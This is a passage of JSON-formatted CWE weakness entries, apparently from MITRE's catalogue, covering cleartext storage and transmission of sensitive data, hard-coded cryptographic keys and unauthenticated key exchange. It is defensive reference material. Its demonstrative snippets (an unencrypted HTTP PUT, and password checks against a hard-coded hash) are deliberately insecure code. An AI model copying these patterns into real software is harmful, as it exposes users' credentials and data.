Cookie","attr":{"@_Date":"2013-07-17"}}]}},"316":{"attr":{"@_ID":"316","@_Name":"Cleartext Storage of Sensitive Information in Memory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in memory.","Extended_Description":{"xhtml:p":["The sensitive memory might be saved to disk, stored in a core dump, or remain uncleared if the application crashes, or if the programmer does not properly clear the memory before freeing it.","It could be argued that such problems are usually only exploitable by those with administrator privileges. However, swapping could cause the memory to be written to disk and leave it accessible to physical attack afterwards. Core dump files might have insecure permissions or be stored in archive files that are accessible to untrusted people. Or, uncleared sensitive memory might be inadvertently exposed to attackers due to another weakness."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Memory"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1517","Description":"Sensitive authentication information in cleartext in memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1517"},{"Reference":"BID:10155","Description":"Sensitive authentication information in cleartext in memory.","Link":"http://www.securityfocus.com/bid/10155"},{"Reference":"CVE-2001-0984","Description":"Password protector leaves passwords in memory when window is minimized, even when \\"clear password when minimized\\" is set.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0984"},{"Reference":"CVE-2003-0291","Description":"SSH client does not clear credentials from memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0291"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Memory"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":[{"#text":"This could be a resultant weakness, e.g. if the compiler removes code that was intended to wipe memory.","attr":{"@_Type":"Relationship"}},{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Other_Notes, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Plaintext Storage in Memory","attr":{"@_Date":"2013-07-17"}}}},"317":{"attr":{"@_ID":"317","@_Name":"Cleartext Storage of Sensitive Information in GUI","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext within the GUI.","Extended_Description":"An attacker can often obtain data from a GUI, even if hidden, by using an API to directly access GUI objects such as windows and menus. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1848","Description":"Unencrypted passwords stored in GUI dialog may allow local users to access the passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1848"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in GUI"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Plaintext Storage in GUI","attr":{"@_Date":"2013-07-17"}}}},"318":{"attr":{"@_ID":"318","@_Name":"Cleartext Storage of Sensitive Information in Executable","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in an executable.","Extended_Description":"Attackers can reverse engineer binary code to obtain secret data. This is especially easy when the cleartext is plain ASCII. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1794","Description":"Product stores RSA private key in a DLL and uses it to sign a certificate, allowing spoofing of servers and Adversary-in-the-Middle (AITM) attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1794"},{"Reference":"CVE-2001-1527","Description":"administration passwords in cleartext in executable","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1527"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Executable"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"65"}}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Plaintext Storage in Executable","attr":{"@_Date":"2013-07-17"}}}},"319":{"attr":{"@_ID":"319","@_Name":"Cleartext Transmission of Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors.","Extended_Description":"Many communication channels can be \\"sniffed\\" by attackers during data transmission. For example, network traffic can often be sniffed by any attacker who has access to a network interface. This significantly lowers the difficulty of exploitation by attackers.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation"},{"Phase":"System Configuration"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Read Application Data","Modify Files or Directories"],"Note":"Anyone can read the information by gaining access to the channel being used for communication."}},"Detection_Methods":{"Detection_Method":{"attr":{"@_Detection_Method_ID":"DM-11"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process, trigger the feature that sends the data, and look for the presence or absence of common cryptographic functions in the call tree. Monitor the network and determine if the data packets contain readable commands. Tools exist for detecting if certain encodings are in use. If the traffic contains high entropy, this might indicate the usage of encryption."]}}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Encrypt the data with a reliable encryption scheme before transmitting."},{"Phase":"Implementation","Description":"When using web applications with SSL, use SSL for the entire session from login to logout, not just for the initial login page."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Phase":"Operation","Description":"Configure servers to use encrypted channels for communication, which may include SSL or other secure protocols."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-42"},"Intro_Text":"The following code attempts to establish a connection to a site to communicate sensitive information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":[{"#text":"URL u = new URL(\\"http://www.secret.example.org/\\");HttpURLConnection hu = (HttpURLConnection) u.openConnection();hu.setRequestMethod(\\"PUT\\");hu.connect();OutputStream os = hu.getOutputStream();hu.disconnect();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//..."}}],"xhtml:br":""}},"Body_Text":"Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1949","Description":"Passwords transmitted in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1949"},{"Reference":"CVE-2008-4122","Description":"Chain: Use of HTTPS cookie without \\"secure\\" flag causes it to be transmitted across unencrypted HTTP.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4122"},{"Reference":"CVE-2008-3289","Description":"Product sends password hash in cleartext in violation of intended policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3289"},{"Reference":"CVE-2008-4390","Description":"Remote management feature sends sensitive information including passwords in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4390"},{"Reference":"CVE-2007-5626","Description":"Backup routine sends password in cleartext in email.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626"},{"Reference":"CVE-2004-1852","Description":"Product transmits Blowfish encryption key in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1852"},{"Reference":"CVE-2008-0374","Description":"Printer sends configuration information, including administrative password, in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0374"},{"Reference":"CVE-2007-4961","Description":"Chain: cleartext transmission of the MD5 hash of password enables attacks against a server that is susceptible to replay (CWE-294).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961"},{"Reference":"CVE-2007-4786","Description":"Product sends passwords in cleartext to a log server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4786"},{"Reference":"CVE-2005-3140","Description":"Product sends file with cleartext passwords in e-mail message intended for diagnostic purposes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3140"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Transmission of Sensitive Information"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER02-J","Entry_Name":"Sign then seal sensitive objects before sending them outside a trust boundary"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"102"}},{"attr":{"@_CAPEC_ID":"117"}},{"attr":{"@_CAPEC_ID":"383"}},{"attr":{"@_CAPEC_ID":"477"}},{"attr":{"@_CAPEC_ID":"65"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-271"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;Protecting Secret Data&#34; Page 299"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 22: Failing to Protect Network Traffic.&#34; Page 337"}},{"attr":{"@_External_Reference_ID":"REF-172"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-01-23","Modification_Comment":"updated Abstraction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":{"#text":"Plaintext Transmission of Sensitive Information","attr":{"@_Date":"2009-01-12"}}}},"321":{"attr":{"@_ID":"321","@_Name":"Use of Hard-coded Cryptographic Key","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of a hard-coded cryptographic key significantly increases the possibility that encrypted data may be recovered.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"If hard-coded cryptographic keys are used, it is almost certain that malicious users will gain access through the account in question."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Prevention schemes mirror that of hard-coded password storage."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-92"},"Intro_Text":"The following code examples attempt to verify a password using a hard-coded cryptographic key.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password,\\"68af404b513073584c4b6f22b6c63e6b\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","xhtml:br":["",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean VerifyAdmin(String password) {","xhtml:div":{"#text":"if (password.equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}System.out.println(\\"Incorrect Password!\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Entering Diagnostic Mode...\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (password.Equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}Console.WriteLine(\\"Incorrect Password!\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Entering Diagnostic Mode...\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Use of hard-coded cryptographic key"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP33","Entry_Name":"Hardcoded sensitive data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"The main difference between the use of hard-coded passwords and the use of hard-coded cryptographic keys is the false sense of security that the former conveys. Many people believe that simply hashing a hard-coded password before storage will protect the information from malicious users. However, many hashes are reversible (or at least vulnerable to brute force attacks) -- and further, many authentication protocols simply request the hash itself, making it no better than a password.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"322":{"attr":{"@_ID":"322","@_Name":"Key Exchange without Entity Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs a key exchange with an actor without verifying the identity of that actor.","Extended_Description":"Performing a key exchange will preserve the integrity of the information sent between two entities, but this will not guarantee that the entities are who they claim they are. This may enable an attacker to impersonate an actor by modifying traffic between the two entities.  Typically, this involves a victim client that contacts a malicious server that is impersonating a trusted server. If the client skips authentication or ignores an authentication failure, the malicious server may request authentication information from the user. The malicious server can then use this authentication information to log in to the trusted server using the victim\'s credentials, sniff traffic between the victim and trusted server, etc.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"295","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"No authentication takes place in this process, bypassing an assumed protection of encryption."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The encrypted communication between a user and a trusted host may be subject to sniffing by any actor in the communication path."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that proper authentication is included in the system design."},{"Phase":"Implementation","Description":"Understand and properly implement all checks necessary to ensure the identity of entities involved in encrypted communications."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Many systems have used Diffie-Hellman key exchange without authenticating the entities exchanging keys, allowing attackers to influence communications by redirecting or interfering with the communication path.  Many people using SSL/TLS skip the authentication (often unknowingly)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Key exchange without entity 